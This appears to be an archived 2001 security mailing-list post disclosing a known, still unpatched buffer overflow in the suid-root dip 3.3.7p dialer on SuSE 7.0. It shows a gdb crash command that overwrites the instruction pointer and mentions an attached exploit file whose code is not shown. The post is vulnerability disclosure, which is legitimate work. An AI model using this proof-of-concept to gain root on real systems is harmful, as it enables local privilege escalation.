dip 3.3.7p-overflow

From: sebi hegi (hegenbartat_private)
Date: Mon Jul 09 2001 - 11:33:37 PDT

Next message: Will DeHaan: "Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)"

Previous message: Tina Bird: "RE: Nokia contact information (fwd)"
Next in thread: teoat_private: "Re: dip 3.3.7p-overflow"
Reply: teoat_private: "Re: dip 3.3.7p-overflow"
Reply: Marcin Marszalek: "Re: dip 3.3.7p-overflow"
Reply: Martijn A.: "Re: dip 3.3.7p-overflow"
Reply: Kevin W.: "Re: dip 3.3.7p-overflow"
Reply: Martijn A.: "Re: dip 3.3.7p-overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi!
After doing a check on my SuSE linux 7.0 x86 i found something interesting:

hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr--   1 root     dialout     62056 Jul 29  2000 /usr/sbin/dip

DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

I considered this as a sort of old version and did some searching and found
something on insecure.org as well as on securityfocus.com.

Description: Standard overflow (in the -l option processing).
Author:  Goran Gajic <ggajicat_private>
Compromise: root (local)
Vulnerable Systems: Slackware Linux 3.4, presumably any other system using dip-3.3.7o or earlier suid root.
Date: 5 May 1998

Referring to a bugtraq post from may 5. 1998 I did son research:

root@faust:/home/hegi > gdb /usr/sbin/dip
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) run -k -l `perl -e 'print "a" x 130 '`
Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()

Looks like this version is still vulnerable although it went public in 1998
referring to securityfocus.com. 

It´s not world executable but still a security risk on SuSE 7.0. And I´m
wondering why at least SuSE still shippes a product with a known vulnerability.
I was told that Slackware 7.1 shippes the same version as well vulnerable. 

The vendor was contacted 3 years ago, still not patched. 
( I wouldn´t consider a sprintf so damn hard to patch. )

Have a nice day. 
Sebastian Hegenbart

text/x-c attachment: dip-exp.c

Next message: Will DeHaan: "Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)"
Previous message: Tina Bird: "RE: Nokia contact information (fwd)"
Next in thread: teoat_private: "Re: dip 3.3.7p-overflow"
Reply: teoat_private: "Re: dip 3.3.7p-overflow"
Reply: Marcin Marszalek: "Re: dip 3.3.7p-overflow"
Reply: Martijn A.: "Re: dip 3.3.7p-overflow"
Reply: Kevin W.: "Re: dip 3.3.7p-overflow"
Reply: Martijn A.: "Re: dip 3.3.7p-overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jul 09 2001 - 17:22:37 PDT